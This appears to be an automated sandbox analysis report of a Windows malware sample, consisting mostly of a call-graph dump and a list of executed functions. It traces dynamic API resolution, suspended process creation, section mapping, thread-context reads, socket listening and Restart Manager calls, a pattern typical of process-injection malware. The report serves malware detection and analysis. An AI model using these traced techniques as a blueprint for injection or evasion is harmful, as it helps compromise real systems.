127207->127223 127209 88bd5 127209->127205 127211 88cfe 127209->127211 127209->127215 127219 7f41b EnterCriticalSection LeaveCriticalSection 127209->127219 127214 88d29 127211->127214 127220 7f41b EnterCriticalSection LeaveCriticalSection 127211->127220 127214->127215 127221 7f489 EnterCriticalSection LeaveCriticalSection 127214->127221 127215->127205 127215->127207 127222 8795d 49 API calls 127215->127222 127224 8770d 127216->127224 127218 877a1 _memcmp 127218->127209 127219->127211 127220->127214 127221->127215 127222->127207 127223->127205 127225 8771b 127224->127225 127227 8776c 127224->127227 127226 87698 28 API calls 127225->127226 127225->127227 127226->127227 127227->127218 127228->127026 127229->127028 127230->127037 127231->127039 127232->127036 127233 255003a 127236 25505a7 127233->127236 127235 2550047 127237 25505ce 127236->127237 127239 25505e9 127236->127239 127238 25505ef VirtualAlloc 127237->127238 127237->127239 127247 2550320 127238->127247 127239->127235 127241 255061c 127242 2550623 127241->127242 127252 2550123 127241->127252 127242->127235 127244 2550634 127245 2550657 127244->127245 127257 92461 127244->127257 127245->127235 127249 255033a 127247->127249 127248 25503be 127248->127241 127249->127248 127250 255038c VirtualProtect 127249->127250 127250->127249 127251 25503c9 127250->127251 127251->127241 127253 2550141 127252->127253 127254 2550148 127252->127254 127253->127244 127254->127254 127255 25501be LoadLibraryA 127254->127255 127256 2550246 127254->127256 127255->127254 127255->127256 127256->127244 127258 9246a 127257->127258 127259 9246f dllmain_dispatch 127257->127259 127261 9283b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 127258->127261 127259->127245 127261->127259 127262 a15b8 127263 a15f6 127262->127263 127267 a15c6 ___crtLCMapStringA 127262->127267 127270 9a892 20 API calls __dosmaperr 127263->127270 127265 a15e1 RtlAllocateHeap 127266 a15f4 127265->127266 127265->127267 127267->127263 127267->127265 127269 9fa69 7 API calls 2 library calls 127267->127269 127269->127267 127270->127266 127271 9233b 127273 92347 ___DestructExceptionObject 127271->127273 127272 92370 dllmain_raw 127275 9238a dllmain_crt_dispatch 127272->127275 127276 92356 ___DestructExceptionObject 127272->127276 127273->127272 127274 9236b 127273->127274 127273->127276 127284 6db3c 127274->127284 127275->127274 127275->127276 127279 923d7 127279->127276 127280 923e0 dllmain_crt_dispatch 127279->127280 127280->127276 127282 923f3 dllmain_raw 127280->127282 127281 6db3c 609 API calls 127283 923c3 dllmain_crt_dispatch dllmain_raw 127281->127283 127282->127276 127283->127279 127285 6db45 CreateThread 127284->127285 127286 6db59 127284->127286 127285->127286 127287 6db60 127285->127287 127286->127279 127286->127281 127290 6db6f 127287->127290 127501 7ad7f LoadLibraryA GetProcAddress 127290->127501 127292 6db89 GetModuleFileNameW 127506 6e250 127292->127506 127294 6dba5 127295 62125 27 API calls 127294->127295 127296 6dbb4 127295->127296 127297 62125 27 API calls 127296->127297 127298 6dbc3 127297->127298 127517 79f88 127298->127517 127302 6dbd5 127303 6dbe4 127302->127303 127304 6dc2e 127302->127304 127723 6e6de 115 API calls 127303->127723 127305 61e82 27 API calls 127304->127305 127307 6dc3c 127305->127307 127311 61e82 27 API calls 127307->127311 127308 6dbf6 127309 61e82 27 API calls 127308->127309 127310 6dc02 127309->127310 127724 6fa5c 35 API calls 2 library calls 127310->127724 127312 6dc5b 127311->127312 127313 65449 27 API calls 127312->127313 127315 6dc6a 127313->127315 127318 6646f 27 API calls 127315->127318 127316 6dc14 127725 6e68f 76 API calls 127316->127725 127320 6dc76 127318->127320 127319 6dc1d 127726 6e23d 69 API calls 127319->127726 127322 6200a 27 API calls 127320->127322 127323 6dc82 127322->127323 127325 62000 26 API calls 127323->127325 127326 6dc8b 127325->127326 127328 62000 26 API calls 127326->127328 127330 6dc94 127328->127330 127331 61e82 27 API calls 127330->127331 127332 6dc9d 127331->127332 127543 61fe6 127332->127543 127334 6dca8 127335 61e82 27 API calls 127334->127335 127336 6dcc2 127335->127336 127547 6ca50 127336->127547 127502 7adc0 LoadLibraryA GetProcAddress 127501->127502 127503 7adac GetModuleHandleA GetProcAddress 127501->127503 127504 7adec 44 API calls 127502->127504 127505 7add8 LoadLibraryA GetProcAddress 127502->127505 127503->127502 127504->127292 127505->127504 127801 79789 FindResourceA 127506->127801 127508 6e26b ___std_exception_copy ctype 127509 620e4 27 API calls 127508->127509 127510 6e297 127509->127510 127511 6200a 27 API calls 127510->127511 127512 6e2a2 127511->127512 127513 62000 26 API calls 127512->127513 127514 6e2aa ___std_exception_copy ctype 127513->127514 127804 66e89 127514->127804 127516 6e2f4 127516->127294 127518 6210e 26 API calls 127517->127518 127538 79f9b 127518->127538 127519 7a00b 127520 62000 26 API calls 127519->127520 127521 7a03d 127520->127521 127522 62000 26 API calls 127521->127522 127524 7a045 127522->127524 127523 7a00d 127525 642ce 27 API calls 127523->127525 127527 62000 26 API calls 127524->127527 127528 7a019 127525->127528 127526 642ce 27 API calls 127526->127538 127530 6dbcc 127527->127530 127531 6200a 27 API calls 127528->127531 127529 6200a 27 API calls 127529->127538 127539 6e640 127530->127539 127532 7a022 127531->127532 127533 62000 26 API calls 127532->127533 127535 7a02a 127533->127535 127534 62000 26 API calls 127534->127538 127808 7b090 27 API calls 127535->127808 127538->127519 127538->127523 127538->127526 127538->127529 127538->127534 127807 7b090 27 API calls 127538->127807 127540 6e64e 127539->127540 127542 6e655 127539->127542 127809 62197 127540->127809 127542->127302 127544 61ff1 127543->127544 127545 61ff9 127543->127545 127830 6262c 27 API calls 127544->127830 127545->127334 127831 61fce 127547->127831 127723->127308 127724->127316 127725->127319 127802 797a6 LoadResource LockResource SizeofResource 127801->127802 127803 797cd 127801->127803 127802->127803 127803->127508 127805 620e4 27 API calls 127804->127805 127806 66e9d 127805->127806 127806->127516 127807->127538 127808->127519 127811 621a0 127809->127811 127810 621d3 127810->127542 127811->127810 127815 62783 127811->127815 127813 621b8 127818 62761 26 API calls std::_Deallocate 127813->127818 127819 63200 127815->127819 127818->127810 127822 63f9e 127819->127822 127823 63fa6 127822->127823 127824 62792 127823->127824 127826 63ff7 127823->127826 127824->127813 127829 6400d 26 API calls 127826->127829 127828 64002 127828->127823 127829->127828 127830->127545 128737 74234 128760 68632 128737->128760 128740 61e82 27 API calls 128741 7424b 128740->128741 128742 62125 27 API calls 128741->128742 128743 74256 128742->128743 128744 61e82 27 API calls 128743->128744 128745 74261 128744->128745 128746 62125 27 API calls 128745->128746 128747 7426c 128746->128747 128748 61e82 27 API calls 128747->128748 128749 74277 128748->128749 128750 62125 27 API calls 128749->128750 128751 74282 128750->128751 128763 66eb8 128751->128763 128755 7429a 128756 62000 26 API calls 128755->128756 128757 753d8 128756->128757 128758 62000 26 API calls 128757->128758 128759 753e4 128758->128759 128761 64836 29 API calls 128760->128761 128762 6863c 128761->128762 128762->128740 128764 6496f 3 API calls 128763->128764 128765 66ec7 128764->128765 128766 64a0a 98 API calls 128765->128766 128767 66ecf 128766->128767 128768 62ff0 27 API calls 128767->128768 128769 66eee 128768->128769 128770 62fcc 27 API calls 128769->128770 128771 66ef9 128770->128771 128772 62fcc 27 API calls 128771->128772 128773 66f04 128772->128773 128774 62fcc 27 API calls 128773->128774 128775 66f0e 128774->128775 128776 64be3 62 API calls 128775->128776 128777 66f1b 128776->128777 128778 62000 26 API calls 128777->128778 128779 66f23 128778->128779 128780 62000 26 API calls 128779->128780 128781 66f2b 128780->128781 128782 62000 26 API calls 128781->128782 128783 66f33 128782->128783 128784 64d38 273 API calls 128783->128784 128785 66f41 128784->128785 128786 62000 26 API calls 128785->128786 128787 66f49 128786->128787 128788 62000 26 API calls 128787->128788 128789 66f51 128788->128789 128790 62000 26 API calls 128789->128790 128791 66f59 128790->128791 128792 68640 97 API calls 128791->128792 128792->128755 128793 6fe45b50 128796 6fe453e0 128793->128796 128798 6fe45453 128796->128798 128797 6fe454af 128800 6fe75be0 33 API calls 128797->128800 128798->128797 128811 6fe7d7c0 36 API calls __DllMainCRTStartup@12 128798->128811 128801 6fe454c7 128800->128801 128802 6fe45e70 HeapFree 128801->128802 128803 6fe454ec 128802->128803 128810 6fe74110 33 API calls __DllMainCRTStartup@12 128803->128810 128805 6fe45533 128812 6fe46080 HeapFree 128805->128812 128807 6fe455b7 128808 6fe46a50 34 API calls 128807->128808 128809 6fe455f1 128808->128809 128810->128805 128811->128797 128812->128807 128813 6fe4b890 128816 6fe4a060 128813->128816 128819 6fe45700 128816->128819 128822 6fe458e0 128819->128822 128825 6fe47ea0 128822->128825 128826 6fe411b0 33 API calls 128825->128826 128827 6fe47ee3 128826->128827 128828 6fe74280 6 API calls 128827->128828 128829 6fe47efa 128828->128829 128834 6fe41a70 128829->128834 128831 6fe47f17 128833 6fe47f56 128831->128833 128837 6fea58e0 33 API calls __DllMainCRTStartup@12 128831->128837 128838 6fe4b290 128834->128838 128836 6fe41aa3 128836->128831 128853 6fe482c0 46 API calls 128838->128853 128840 6fe4b317 128841 6fe4b39e 128840->128841 128846 6fe4b331 128840->128846 128854 6fe45af0 128841->128854 128843 6fe4b426 128857 6fe46a90 33 API calls 128843->128857 128845 6fe45af0 48 API calls 128845->128846 128846->128843 128846->128845 128847 6fe4b549 128846->128847 128859 6fe469e0 HeapFree 128846->128859 128858 6fe46a90 33 API calls 128847->128858 128849 6fe4b571 128860 6fe469e0 HeapFree 128849->128860 128852 6fe4b3ef 128852->128836 128853->128840 128861 6fe7f8e0 128854->128861 128857->128852 128858->128849 128859->128846 128860->128852 128862 6fe7f8f7 128861->128862 128863 6fe45b22 128861->128863 128864 6fe7fa1f 128862->128864 128865 6fe7f908 128862->128865 128863->128852 128881 6fea4ad0 37 API calls __DllMainCRTStartup@12 128864->128881 128873 6fe7ca20 WSASocketW 128865->128873 128869 6fe7fa24 128869->128869 128870 6fe7f9ac bind 128871 6fe7f9df listen 128870->128871 128872 6fe7f9f8 WSAGetLastError closesocket 128870->128872 128871->128863 128871->128872 128872->128863 128874 6fe7ca65 WSAGetLastError 128873->128874 128879 6fe7ca58 128873->128879 128875 6fe7ca72 128874->128875 128876 6fe7ca79 WSASocketW 128874->128876 128875->128876 128875->128879 128877 6fe7ca8e SetHandleInformation 128876->128877 128878 6fe7caac WSAGetLastError 128876->128878 128877->128879 128880 6fe7cabd GetLastError closesocket 128877->128880 128878->128879 128879->128863 128879->128870 128880->128879 128881->128869 128882 6fe5ff90 128885 6fe5fff0 128882->128885 128886 6fe58800 __DllMainCRTStartup@12 35 API calls 128885->128886 128887 6fe60057 128886->128887 128888 6fe5b970 __DllMainCRTStartup@12 33 API calls 128887->128888 128889 6fe60069 128888->128889 128893 6fe600b5 __DllMainCRTStartup@12 128889->128893 128944 6fea58e0 33 API calls __DllMainCRTStartup@12 128889->128944 128891 6fe60145 __DllMainCRTStartup@12 128946 6fe572e0 34 API calls __DllMainCRTStartup@12 128891->128946 128893->128891 128903 6fe50b40 128893->128903 128894 6fe5ffb5 128896 6fe60187 __DllMainCRTStartup@12 128896->128891 128897 6fe601a3 128896->128897 128931 6fe607d0 128897->128931 128899 6fe601f4 __DllMainCRTStartup@12 128939 6fe56990 128899->128939 128904 6fe50bab __DllMainCRTStartup@12 128903->128904 128909 6fe50bd4 __DllMainCRTStartup@12 128904->128909 128947 6fe5de10 37 API calls __DllMainCRTStartup@12 128904->128947 128906 6fe50c10 __DllMainCRTStartup@12 128906->128909 128948 6fe5c120 36 API calls __DllMainCRTStartup@12 128906->128948 128908 6fe50cd6 __DllMainCRTStartup@12 128908->128909 128949 6fe51280 34 API calls __DllMainCRTStartup@12 128908->128949 128909->128896 128911 6fe50db4 __DllMainCRTStartup@12 128912 6fe50e2e 128911->128912 128914 6fe50e2c __DllMainCRTStartup@12 128911->128914 128950 6fe62af0 33 API calls __DllMainCRTStartup@12 128912->128950 128957 6fe56bd0 HeapFree __DllMainCRTStartup@12 128914->128957 128916 6fe50e3d __DllMainCRTStartup@12 128917 6fe50f68 128916->128917 128920 6fe50f25 128916->128920 128921 6fe50f27 128916->128921 128952 6fea5b20 33 API calls __DllMainCRTStartup@12 128917->128952 128920->128921 128953 6fea5b20 33 API calls __DllMainCRTStartup@12 128920->128953 128951 6fe62af0 33 API calls __DllMainCRTStartup@12 128921->128951 128923 6fe50f36 __DllMainCRTStartup@12 128923->128909 128924 6fe510be 128923->128924 128925 6fe5100b 128923->128925 128954 6fea5ae0 33 API calls __DllMainCRTStartup@12 128924->128954 128927 6fe510f4 128925->128927 128928 6fe510bc 128925->128928 128955 6fea5b20 33 API calls __DllMainCRTStartup@12 128927->128955 128928->128909 128956 6fea5b20 33 API calls __DllMainCRTStartup@12 128928->128956 128932 6fe60812 128931->128932 128933 6fe607fc 128931->128933 128965 6fe62900 33 API calls __DllMainCRTStartup@12 128932->128965 128964 6fe62900 33 API calls __DllMainCRTStartup@12 128933->128964 128936 6fe60808 128958 6fe4f850 128936->128958 128938 6fe60857 128938->128899 128980 6fe513f0 128939->128980 128943 6fe569ea 128945 6fe572e0 34 API calls __DllMainCRTStartup@12 128943->128945 128945->128894 128946->128894 128947->128906 128948->128908 128949->128911 128950->128916 128951->128923 128957->128909 128959 6fe4f890 128958->128959 128960 6fe4f8aa 128958->128960 128966 6fe4f460 128959->128966 128973 6fea5a30 33 API calls __DllMainCRTStartup@12 128960->128973 128963 6fe4f8f1 __DllMainCRTStartup@12 128963->128938 128964->128936 128965->128936 128967 6fe50630 __DllMainCRTStartup@12 33 API calls 128966->128967 128971 6fe4f4c0 128967->128971 128968 6fe50630 __DllMainCRTStartup@12 33 API calls 128968->128971 128971->128968 128972 6fe4f533 128971->128972 128974 6fe50570 128971->128974 128978 6fea56f0 33 API calls __DllMainCRTStartup@12 128971->128978 128972->128963 128975 6fe505e7 128974->128975 128977 6fe505bd 128974->128977 128979 6fea56f0 33 API calls __DllMainCRTStartup@12 128975->128979 128977->128971 128996 6fe62800 33 API calls __DllMainCRTStartup@12 128980->128996 128982 6fe5142b __DllMainCRTStartup@12 128997 6fe631f0 128982->128997 128984 6fe51454 __DllMainCRTStartup@12 128985 6fe514c1 128984->128985 128986 6fe51473 128984->128986 129001 6fe57150 HeapFree __DllMainCRTStartup@12 128985->129001 129000 6fe5bc70 33 API calls __DllMainCRTStartup@12 128986->129000 128988 6fe514d4 128995 6fe56bd0 HeapFree __DllMainCRTStartup@12 128988->128995 128990 6fe514bf 129002 6fea55d0 33 API calls __DllMainCRTStartup@12 128990->129002 128995->128943 128996->128982 129003 6fe63320 128997->129003 128999 6fe6320d 128999->128984 129000->128990 129001->128988 129004 6fe63362 __DllMainCRTStartup@12 129003->129004 129006 6fe633bc __DllMainCRTStartup@12 129004->129006 129007 6fe5bff0 43 API calls __DllMainCRTStartup@12 129004->129007 129006->128999 129007->129004 129008 6fe5c150 129011 6fe55c10 129008->129011 129014 6fe5a490 129011->129014 129013 6fe55c50 129015 6fe5a4ce 129014->129015 129017 6fe5a4f5 __DllMainCRTStartup@12 129014->129017 129018 6fe5a570 129015->129018 129017->129013 129025 6fe69580 129018->129025 129027 6fe6958d 129025->129027 129051 6fe693b0 129027->129051 129029 6fe6962e 129055 6fe69490 129029->129055 129031 6fe6963e __DllMainCRTStartup@12 129032 6fe69754 129031->129032 129034 6fe6971a 129031->129034 129038 6fe697bc 129031->129038 129033 6fe69afd VirtualAlloc 129032->129033 129032->129034 129033->129034 129037 6fe69b64 129033->129037 129035 6fe69976 129067 6fe692f0 HeapFree __DllMainCRTStartup@12 129035->129067 129036 6fe69862 CreateFileMappingW 129041 6fe6995a 129036->129041 129042 6fe69998 129036->129042 129070 6fe692f0 HeapFree __DllMainCRTStartup@12 129037->129070 129038->129034 129038->129035 129038->129036 129041->129035 129068 6fe692f0 HeapFree __DllMainCRTStartup@12 129042->129068 129045 6fe6998b 129047 6fe69a1b 129045->129047 129048 6fe699d4 MapViewOfFile 129045->129048 129046 6fe6999d 129046->129048 129069 6fe692f0 HeapFree __DllMainCRTStartup@12 129047->129069 129048->129047 129049 6fe69a19 129048->129049 129071 6fe68bc0 129051->129071 129053 6fe693fa __CreateFrameInfo __DllMainCRTStartup@12 129054 6fe69472 GetSystemInfo 129053->129054 129054->129029 129056 6fe694c0 129055->129056 129057 6fe694ad 129055->129057 129083 6fea5c20 38 API calls 2 library calls 129056->129083 129059 6fe69507 129057->129059 129060 6fe694ec 129057->129060 129061 6fe694cd 129057->129061 129084 6fea5ae0 33 API calls __DllMainCRTStartup@12 129059->129084 129063 6fe69537 129060->129063 129064 6fe69505 129060->129064 129061->129031 129085 6fea5c20 38 API calls 2 library calls 129063->129085 129064->129061 129086 6fea5b20 33 API calls __DllMainCRTStartup@12 129064->129086 129067->129045 129068->129046 129069->129049 129070->129034 129076 6fe68fa0 129071->129076 129073 6fe68c2a 129073->129053 129077 6fe68fc3 129076->129077 129078 6fe68c08 129076->129078 129077->129078 129082 6fea55d0 33 API calls __DllMainCRTStartup@12 129077->129082 129078->129073 129081 6fea56f0 33 API calls __DllMainCRTStartup@12 129078->129081 129087 74931 129088 61e82 27 API calls 129087->129088 129089 74941 129088->129089 129090 62125 27 API calls 129089->129090 129091 7494c 129090->129091 129092 61e82 27 API calls 129091->129092 129093 74957 129092->129093 129094 62125 27 API calls 129093->129094 129095 74962 129094->129095 129098 70d7e 129095->129098 129099 6496f 3 API calls 129098->129099 129100 70d92 129099->129100 129101 64a0a 98 API calls 129100->129101 129102 70d9a 129101->129102 129103 62ff0 27 API calls 129102->129103 129104 70db3 129103->129104 129105 62fcc 27 API calls 129104->129105 129106 70dbd 129105->129106 129107 64be3 62 API calls 129106->129107 129108 70dc7 129107->129108 129109 62000 26 API calls 129108->129109 129110 70dcf 129109->129110 129111 64d38 273 API calls 129110->129111 129112 70ddd 129111->129112 129113 62000 26 API calls 129112->129113 129114 70de5 129113->129114 129115 62000 26 API calls 129114->129115 129116 70ded 129115->129116 129117 6fe76250 129126 6fe76298 129117->129126 129133 6fe7610a 129117->129133 129119 6fe7628c 129140 6fe4c770 HeapFree 129119->129140 129122 6fe763e3 129142 6fea5990 33 API calls __DllMainCRTStartup@12 129122->129142 129123 6fe763d7 129141 6fea5970 33 API calls __DllMainCRTStartup@12 129123->129141 129133->129117 129133->129119 129133->129122 129133->129123 129133->129126 129134 6fe73b20 5 API calls 129133->129134 129135 6fe76440 129133->129135 129137 6fe7c630 129133->129137 129139 6fe4c770 HeapFree 129133->129139 129134->129133 129143 6fe76467 129135->129143 129178 6fe7c652 129137->129178 129139->129133 129140->129126 129158 6fe7c490 129143->129158 129160 6fe7c4b8 129158->129160 129163 6fe7c7f0 129160->129163 129164 6fe7c819 NtReadFile 129163->129164 129166 6fe7c862 WaitForSingleObject 129164->129166 129167 6fe7c86f 129164->129167 129166->129167 129168 6fe7c886 129167->129168 129169 6fe7c8ab 129167->129169 129171 6fe7c4e3 129167->129171 129170 6fe7c89c RtlNtStatusToDosError 129168->129170 129168->129171 129176 6fe77160 HeapFree __DllMainCRTStartup@12 129169->129176 129170->129171 129173 6fe7c8f4 129177 6fe730e0 HeapFree __DllMainCRTStartup@12 129173->129177 129175 6fe7c904 129176->129173 129177->129175 129179 6fe7c785 129178->129179 129180 6fe7c679 129178->129180 129189 6fea5950 33 API calls __DllMainCRTStartup@12 129179->129189 129182 6fe7c7f0 4 API calls 129180->129182 129187 6fe7c693 129182->129187 129190 6fe9aa91 GetLastError 129191 6fe9aaad 129190->129191 129192 6fe9aaa7 129190->129192 129194 6fe98b3c __dosmaperr 6 API calls 129191->129194 129196 6fe9aab1 SetLastError 129191->129196 129213 6fe98afd 6 API calls __dosmaperr 129192->129213 129195 6fe9aac9 129194->129195 129195->129196 129198 6fe987eb __dosmaperr 12 API calls 129195->129198 129199 6fe9aade 129198->129199 129200 6fe9aaf7 129199->129200 129201 6fe9aae6 129199->129201 129202 6fe98b3c __dosmaperr 6 API calls 129200->129202 129203 6fe98b3c __dosmaperr 6 API calls 129201->129203 129204 6fe9ab03 129202->129204 129210 6fe9aaf4 129203->129210 129205 6fe9ab1e 129204->129205 129206 6fe9ab07 129204->129206 129215 6fe9a742 14 API calls __dosmaperr 129205->129215 129207 6fe98b3c __dosmaperr 6 API calls 129206->129207 129207->129210 129214 6fe98848 14 API calls __dosmaperr 129210->129214 129211 6fe9ab29 129216 6fe98848 14 API calls __dosmaperr 129211->129216 129213->129191 129214->129196 129215->129211 129216->129196

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 0007AD7F Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 170libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007AD92
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AD9B
                                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007ADB6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADB9
                                                                                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADCA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADCD
                                                                                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADE2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADE5
                                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0006DB89), ref: 0007ADF6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADF9
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0006DB89), ref: 0007AE05
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE08
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0006DB89), ref: 0007AE19
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE1C
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0006DB89), ref: 0007AE2D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE30
                                                                                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0006DB89), ref: 0007AE41
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE44
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0006DB89), ref: 0007AE55
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE58
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0006DB89), ref: 0007AE69
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE6C
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0006DB89), ref: 0007AE7D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE80
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0006DB89), ref: 0007AE91
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE94
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0006DB89), ref: 0007AEA5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEA8
                                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0006DB89), ref: 0007AEB6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEB9
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,0006DB89), ref: 0007AECA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AECD
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,0006DB89), ref: 0007AEDE
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEE1
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,0006DB89), ref: 0007AEF2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEF5
                                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,0006DB89), ref: 0007AF06
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF09
                                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,0006DB89), ref: 0007AF1A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF1D
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,0006DB89), ref: 0007AF2E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF31
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,0006DB89), ref: 0007AF42
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF45
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,0006DB89), ref: 0007AF57
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF5A
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,0006DB89), ref: 0007AF67
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF6A
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,0006DB89), ref: 0007AF77
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF7A
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,0006DB89), ref: 0007AF87
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                • API String ID: 4236061018-3687161714
                                                                                                                                                                • Opcode ID: aac0ccd537d8fcefd03575b043e1854775ee4d5b8cbff118c476392b71a53c50
                                                                                                                                                                • Instruction ID: 04b4f0dea5b7981d34f5737f70cd1f6786ebff80a53d4d47833ab89b3e92a840
                                                                                                                                                                • Opcode Fuzzy Hash: aac0ccd537d8fcefd03575b043e1854775ee4d5b8cbff118c476392b71a53c50
                                                                                                                                                                • Instruction Fuzzy Hash: 1841DEF0E8235879EA106BB65D4EE5F2E5CDB84B94302891FB6049B591DFBC98008F7D
                                                                                                                                                                Function 00076447 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 291nativelibraryloaderCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0007647F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00076486
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00076497
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007649E
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000764AF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000764B6
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000764C7
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000764CE
                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,0006421E), ref: 0007656E
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00076586
                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(FFFFDD03,00000000), ref: 0007659B
                                                                                                                                                                • ReadProcessMemory.KERNEL32(0006421E,?,?,00000004,?), ref: 000765BF
